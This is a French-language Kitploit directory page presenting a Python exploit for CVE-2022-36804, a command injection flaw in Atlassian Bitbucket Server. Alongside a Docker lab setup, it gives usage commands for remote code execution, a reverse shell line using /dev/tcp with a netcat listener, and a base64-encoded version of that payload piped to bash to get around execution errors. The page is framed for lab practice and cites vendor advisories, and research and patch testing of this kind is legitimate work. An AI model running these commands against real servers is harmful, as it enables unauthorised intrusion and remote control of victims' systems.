Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/imbas007/atlassian-bitbucket-cve-2022-36804
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleLabs et Pratique
GitHubimbas007/atlassian-bitbucket-cve-2022-36804

Atlassian-Bitbucket-CVE-2022-36804

Exploit Python pour l'injection de commande CVE-2022-36804 dans Atlassian Bitbucket Server, permettant l'exécution de code à distance et un shell inversé avec des commandes personnalisables et un environnement de laboratoire Docker.

Voir le dépôt
1il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Atlassian-Bitbucket-Server-CVE-2022-36804

Une vulnérabilité critique d'injection de commandes a été découverte dans plusieurs points de terminaison API du serveur Bitbucket et du Data Center d'Atlassian. Cette vulnérabilité affecte toutes les versions de Bitbucket Server et Data Center publiées avant les versions <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2, et <8.3.1

Laboratoire pour CVE-2022-36804

Construire l'image Docker

root@kitploit:~
docker build -t bitbucket .

Exécuter le conteneur Docker

root@kitploit:~
docker run -it bitbucket

Utilisation de cve-2022-36804.py

Vérifier l'exécution de code à distance (RCE)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

Vérifier l'ECR avec une commande personnalisée (cmd)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

Vérifier l'ECR avec une commande personnalisée, la clé de projet et le nom du dépôt

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

Obtenir un shell avec netcat

Remplacez 172.17.0.3 par votre adresse IP locale

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"

Démarrer un écouteur netcat avec :

root@kitploit:~
nc -lvp 4444

Reverse shell en ligne : https://www.revshells.com

root@kitploit:~
Convertissez `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` en base64 en cas d'erreur d'exécution du payload. 

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"

root@kitploit:~
Il est recommandé d'installer une version vulnérable du serveur Bitbucket sur une machine Windows/Linux pour s'exercer. Il sera plus facile d'obtenir un reverse shell qu'avec des images Docker.

Plus d'informations peuvent être trouvées [ici](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/)

# Références
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804
Télécharger l’outil